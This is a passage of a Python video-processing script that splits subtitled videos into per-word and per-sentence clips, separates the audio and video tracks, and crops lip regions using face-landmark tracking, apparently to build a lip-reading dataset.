# REMOVE OR ELIMINATE SPECIAL CHARACTERS. CARE MUST BE TAKEN NOT TO INPUT THE TIME VALUES
acpwe = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = acpwe, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
#9
# function to save subtitles in easy to read format
#acpwe
module_save_variables.save_sub(VAR_INPUT=acpwe, FILE_NAME=INPUT_FILE_NAME+'_acpwe', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
#11
# create a folders to store all chopped samples #chopped_sample_per_word_folder_dir
chopped_sample_per_word_folder_dir_acpwe = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_word_acpwe', FILE_PERMISION = '777')
#13
# acpwe and atpwe
# split the video into chunks of each word per video and save them in the chopped_samples_per_word folder #word_chunk_samples_info
word_chunk_samples_info_acpwe = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = acpwe, TIMES_PER_WORD = atpwe, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_word_folder_dir_acpwe, SAVE_FILE_NAME = chopped_sample_per_word_folder_dir_acpwe + '/word_chunk_samples_info_acpwe.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_acpwe, EXTEND_LEFT = extend_left_acpwe, EXTEND_RIGHT = extend_right_acpwe, EXTENSION = '.mkv', START_INDEX = start_index_acpwe, STOP_INDEX = stop_index_acpwe, SAVE = True)
#15
# create new folders which will contain only the audio segments, the none-audio video segments and combined audio and video cropped result
# create a folders to store all chopped samples
# chopped_sample_per_word_folder_dir_pure_audio
chopped_sample_per_word_folder_dir_pure_audio_acpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_acpwe + '/pure_audio', FILE_PERMISION = '777')
chopped_sample_per_word_folder_dir_pure_video_acpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_acpwe + '/pure_video', FILE_PERMISION = '777')
#chopped_sample_per_word_folder_dir_combined_acpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_acpwe + '/combined', FILE_PERMISION = '777')
if (mcpwe == None or mcpwe == [] or mtpwe == None or mtpwe == []):
word_chunk_samples_info_mcpwe = None
chopped_sample_per_word_folder_dir_mcpwe = None
chopped_sample_per_word_folder_dir_pure_audio_mcpwe = None
chopped_sample_per_word_folder_dir_pure_video_mcpwe = None
else:
#7 OPTIONAL
# REMOVE OR ELIMINATE SPECIAL CHARACTERS. CARE MUST BE TAKEN NOT TO INPUT THE TIME VALUES
mcpwe = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = mcpwe, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
#9
# function to save subtitles in easy to read format
#mcpwe
module_save_variables.save_sub(VAR_INPUT=mcpwe, FILE_NAME=INPUT_FILE_NAME+'_mcpwe', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
#11
# create a folders to store all chopped samples #chopped_sample_per_word_folder_dir
chopped_sample_per_word_folder_dir_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_word_mcpwe', FILE_PERMISION = '777')
#13
# mcpwe and mtpwe
# split the video into chunks of each word per video and save them in the chopped_samples_per_word folder #word_chunk_samples_info
word_chunk_samples_info_mcpwe = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = mcpwe, TIMES_PER_WORD = mtpwe, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_word_folder_dir_mcpwe, SAVE_FILE_NAME = chopped_sample_per_word_folder_dir_mcpwe + '/word_chunk_samples_info_mcpwe.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_mcpwe, EXTEND_LEFT = extend_left_mcpwe, EXTEND_RIGHT = extend_right_mcpwe, EXTENSION = '.mkv', START_INDEX = start_index_mcpwe, STOP_INDEX = stop_index_mcpwe, SAVE = True)
#15
# create new folders which will contain only the audio segments and the none-audio video segments
# create a folders to store all chopped samples
# chopped_sample_per_word_folder_dir_pure_audio
chopped_sample_per_word_folder_dir_pure_audio_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_mcpwe + '/pure_audio', FILE_PERMISION = '777')
chopped_sample_per_word_folder_dir_pure_video_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_mcpwe + '/pure_video', FILE_PERMISION = '777')
#chopped_sample_per_word_folder_dir_combined_mcpwe = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_word_folder_dir_mcpwe + '/combined', FILE_PERMISION = '777')
if (acpse == None or acpse == [] or atpse == None or atpse == []):
sentence_chunk_samples_info_acpse = None
chopped_sample_per_sentence_folder_dir_acpse = None
chopped_sample_per_sentence_folder_dir_pure_audio_acpse = None
chopped_sample_per_sentence_folder_dir_pure_video_acpse = None
else:
#7 OPTIONAL
# REMOVE OR ELIMINATE SPECIAL CHARACTERS. CARE MUST BE TAKEN NOT TO INPUT THE TIME VALUES
acpse = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = acpse, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
#9
# function to save subtitles in easy to read format
#acpse
module_save_variables.save_sub(VAR_INPUT=acpse, FILE_NAME=INPUT_FILE_NAME+'_acpse', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
#11
# create a folders to store all chopped samples #chopped_sample_per_sentence_folder_dir
chopped_sample_per_sentence_folder_dir_acpse = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_acpse', FILE_PERMISION = '777')
#13
# acpse and atpse
# split the video into chunks of each word per video and save them in the chopped_samples_per_word folder #sentence_chunk_samples_info
sentence_chunk_samples_info_acpse = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = acpse, TIMES_PER_WORD = atpse, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpse, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_acpse + '/sentence_chunk_samples_info_acpse.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_acpse, EXTEND_LEFT = extend_left_acpse, EXTEND_RIGHT = extend_right_acpse, EXTENSION = '.mkv', START_INDEX = start_index_acpse, STOP_INDEX = stop_index_acpse, SAVE = True)
#15
# create new folders which will contain only the audio segments and the none-audio video segments
# create a folders to store all chopped samples
# chopped_sample_per_sentence_folder_dir_pure_audio
chopped_sample_per_sentence_folder_dir_pure_audio_acpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpse + '/pure_audio', FILE_PERMISION = '777')
chopped_sample_per_sentence_folder_dir_pure_video_acpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpse + '/pure_video', FILE_PERMISION = '777')
#chopped_sample_per_word_folder_dir_combined_acpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpse + '/combined', FILE_PERMISION = '777')
if (acpsh == None or acpsh == [] or atpsh == None or atpsh == []):
sentence_chunk_samples_info_acpsh = None
chopped_sample_per_sentence_folder_dir_acpsh = None
chopped_sample_per_sentence_folder_dir_pure_audio_acpsh = None
chopped_sample_per_sentence_folder_dir_pure_video_acpsh = None
else:
#7 OPTIONAL
# REMOVE OR ELIMINATE SPECIAL CHARACTERS. CARE MUST BE TAKEN NOT TO INPUT THE TIME VALUES
acpsh = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = acpsh, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
#9
# function to save subtitles in easy to read format
#acpsh
module_save_variables.save_sub(VAR_INPUT=acpsh, FILE_NAME=INPUT_FILE_NAME+'_acpsh', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
#11
# create a folders to store all chopped samples #chopped_sample_per_sentence_folder_dir
chopped_sample_per_sentence_folder_dir_acpsh = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_acpsh', FILE_PERMISION = '777')
#13
# acpsh and atpsh
# split the video into chunks of each word per video and save them in the chopped_samples_per_word folder #sentence_chunk_samples_info
sentence_chunk_samples_info_acpsh = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = acpsh, TIMES_PER_WORD = atpsh, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpsh, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_acpsh + '/sentence_chunk_samples_info_acpsh.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_acpsh, EXTEND_LEFT = extend_left_acpsh, EXTEND_RIGHT = extend_right_acpsh, EXTENSION = '.mkv', START_INDEX = start_index_acpsh, STOP_INDEX = stop_index_acpsh, SAVE = True)
#15
# create new folders which will contain only the audio segments and the none-audio video segments
# create a folders to store all chopped samples
# chopped_sample_per_sentence_folder_dir_pure_audio
chopped_sample_per_sentence_folder_dir_pure_audio_acpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpsh + '/pure_audio', FILE_PERMISION = '777')
chopped_sample_per_sentence_folder_dir_pure_video_acpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpsh + '/pure_video', FILE_PERMISION = '777')
#chopped_sample_per_word_folder_dir_combined_acpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_acpsh + '/combined', FILE_PERMISION = '777')
if (mcpse == None or mcpse == [] or mtpse == None or mtpse == []):
sentence_chunk_samples_info_mcpse = None
chopped_sample_per_sentence_folder_dir_mcpse = None
chopped_sample_per_sentence_folder_dir_pure_audio_mcpse = None
chopped_sample_per_sentence_folder_dir_pure_video_mcpse = None
else:
#7 OPTIONAL
# REMOVE OR ELIMINATE SPECIAL CHARACTERS. CARE MUST BE TAKEN NOT TO INPUT THE TIME VALUES
mcpse = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = mcpse, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
#9
# function to save subtitles in easy to read format
#mcpse
module_save_variables.save_sub(VAR_INPUT=mcpse, FILE_NAME=INPUT_FILE_NAME+'_mcpse', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
#11
# create a folders to store all chopped samples #chopped_sample_per_sentence_folder_dir
chopped_sample_per_sentence_folder_dir_mcpse = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_mcpse', FILE_PERMISION = '777')
#13
# mcpse and mtpse
# split the video into chunks of each word per video and save them in the chopped_samples_per_word folder #sentence_chunk_samples_info
sentence_chunk_samples_info_mcpse = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = mcpse, TIMES_PER_WORD = mtpse, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpse, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_mcpse + '/sentence_chunk_samples_info_mcpse.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_mcpse, EXTEND_LEFT = extend_left_mcpse, EXTEND_RIGHT = extend_right_mcpse, EXTENSION = '.mkv', START_INDEX = start_index_mcpse, STOP_INDEX = stop_index_mcpse, SAVE = True)
#15
# create new folders which will contain only the audio segments and the none-audio video segments
# create a folders to store all chopped samples
# chopped_sample_per_sentence_folder_dir_pure_audio
chopped_sample_per_sentence_folder_dir_pure_audio_mcpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpse + '/pure_audio', FILE_PERMISION = '777')
chopped_sample_per_sentence_folder_dir_pure_video_mcpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpse + '/pure_video', FILE_PERMISION = '777')
#chopped_sample_per_word_folder_dir_combined_mcpse = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpse + '/combined', FILE_PERMISION = '777')
if (mcpsh == None or mcpsh == [] or mtpsh == None or mtpsh == []):
sentence_chunk_samples_info_mcpsh = None
chopped_sample_per_sentence_folder_dir_mcpsh = None
chopped_sample_per_sentence_folder_dir_pure_audio_mcpsh = None
chopped_sample_per_sentence_folder_dir_pure_video_mcpsh = None
else:
#7 OPTIONAL
# REMOVE OR ELIMINATE SPECIAL CHARACTERS. CARE MUST BE TAKEN NOT TO INPUT THE TIME VALUES
mcpsh = module_process_subtitles.remove_or_replace_special_char(INPUT_SUB_LIST = mcpsh, CHAR_TO_REPLACE = 'all', CHAR_TO_REPLACE_WITH = '')
#9
#mcpsh
module_save_variables.save_sub(VAR_INPUT=mcpsh, FILE_NAME=INPUT_FILE_NAME+'_mcpsh', TXT=False, JSON=True, TXT_SEPARATOR = '\n')
#11
# create a folders to store all chopped samples #chopped_sample_per_sentence_folder_dir
chopped_sample_per_sentence_folder_dir_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = FOLDER_PATH + '/chopped_samples_per_sentence_mcpsh', FILE_PERMISION = '777')
#13
# mcpsh and mtpsh
# split the video into chunks of each word per video and save them in the chopped_samples_per_word folder #sentence_chunk_samples_info
sentence_chunk_samples_info_mcpsh = module_video_processing.chop_video_per_word_or_sentence(LIST_PER_WORD = mcpsh, TIMES_PER_WORD = mtpsh, MAX_TIME = max_time, FILE_NAME = INPUT_FILE_NAME, CHOPPED_SAMPLE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpsh, SAVE_FILE_NAME = chopped_sample_per_sentence_folder_dir_mcpsh + '/sentence_chunk_samples_info_mcpsh.csv', SHIFT_RIGHT_OR_LEFT = shift_right_or_left_mcpsh, EXTEND_LEFT = extend_left_mcpsh, EXTEND_RIGHT = extend_right_mcpsh, EXTENSION = '.mkv', START_INDEX = start_index_mcpsh, STOP_INDEX = stop_index_mcpsh, SAVE = True)
#15
# create new folders which will contain only the audio segments, the none-audio video segments and combined audio and video cropped result
# create a folders to store all chopped samples
# chopped_sample_per_sentence_folder_dir_pure_audio
chopped_sample_per_sentence_folder_dir_pure_audio_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpsh + '/pure_audio', FILE_PERMISION = '777')
chopped_sample_per_sentence_folder_dir_pure_video_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpsh + '/pure_video', FILE_PERMISION = '777')
#chopped_sample_per_word_folder_dir_combined_mcpsh = module_sample_name.folder_gen(RANDOM_STRING = chopped_sample_per_sentence_folder_dir_mcpsh + '/combined', FILE_PERMISION = '777')
#16
# make lists which will contain only the file names of each sample. Process file names
# new var EXAMPLE
LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES = module_video_processing.generate_list_input_word_chunk_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_acpwe)
LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES = module_video_processing.generate_list_input_word_chunk_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_mcpwe)
# new var EXAMPLE
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpsh)
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpse)
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpsh)
LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES = module_video_processing.generate_list_input_sentence_chunk_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpse)
# new var EXAMPLE
LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES = module_video_processing.generate_list_output_audio_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_acpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_acpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_word_folder_dir_pure_audio_acpwe, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES = module_video_processing.generate_list_output_audio_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_mcpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_mcpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_word_folder_dir_pure_audio_mcpwe, AUDIO_EXTENSION = '.wav')
# new var EXAMPLE
LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES = module_video_processing.generate_list_output_video_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_acpwe , CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_acpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_word_folder_dir_pure_video_acpwe, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES = module_video_processing.generate_list_output_video_word_chopped_samples_file_names(WORD_CHUNK_SAMPLES_FILE_NAMES = word_chunk_samples_info_mcpwe , CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR = chopped_sample_per_word_folder_dir_mcpwe, CHOPPED_SAMPLE_PER_WORD_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_word_folder_dir_pure_video_mcpwe, VIDEO_EXTENSION = '.mkv')
# new var EXAMPLE
LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_mcpsh, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_mcpse, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_acpsh, AUDIO_EXTENSION = '.wav')
LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_audio_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_AUDIO = chopped_sample_per_sentence_folder_dir_pure_audio_acpse, AUDIO_EXTENSION = '.wav')
# new var EXAMPLE
LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_mcpsh, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_acpse, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_acpsh, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_acpsh, VIDEO_EXTENSION = '.mkv')
LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES = module_video_processing.generate_list_output_video_sentence_chopped_samples_file_names(SENTENCE_CHUNK_SAMPLES_FILE_NAMES = sentence_chunk_samples_info_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR = chopped_sample_per_sentence_folder_dir_mcpse, CHOPPED_SAMPLE_PER_SENTENCE_FOLDER_DIR_PURE_VIDEO = chopped_sample_per_sentence_folder_dir_pure_video_mcpse, VIDEO_EXTENSION = '.mkv')
#17
# extract the audio from the chopped samples and recreate new files which will contain only the audio and save them in the folders pure_audio
# for single file
# module_video_processing.extract_audio_from_single_mkv_files(INPUT_FILE_NAME, OUTPUT_FILE_NAME, BIT_RATE = '192000')
# for multiple files per word
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES, BIT_RATE = '192000')
# for multiple files per sentence
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES, BIT_RATE = '192000')
#18
# remove copy the chopped samples but withought the audio and save them pure_video folders
# for single file
#module_video_processing.remove_audio_from_mkv_file(INPUT_FILE_NAME, OUTPUT_FILE_NAME)
# for multiple files per word
#module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = list_input_word_chunk_samples_file_names, OUTPUT_FILE_NAME = list_output_video_word_chopped_names)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES)
# for multiple files per sentence
#module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = list_input_sentence_chunk_samples_file_names, OUTPUT_FILE_NAME = list_output_video_sentence_chopped_names)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES)
#19
# Apply face recognition and chopping for both. Fourcc M J P G is (FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G') one form of compression. An uncompressed video so that it saves each frame is RGBA, FOURCC1='R', FOURCC2='G', FOURCC3='B',FOURCC4 ='A' which is a loss less codec however that creates massive files
#0, for flipping the image around the x-axis (vertical flipping);
#> 0 for flipping around the y-axis (horizontal flipping);
#< 0 for flipping around both axe FLIP == True, FLIP_ARGUMENT =1
#acpwe
pure_video_cropped_word_chunk_samples_info_acpwe = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
#mcpwe
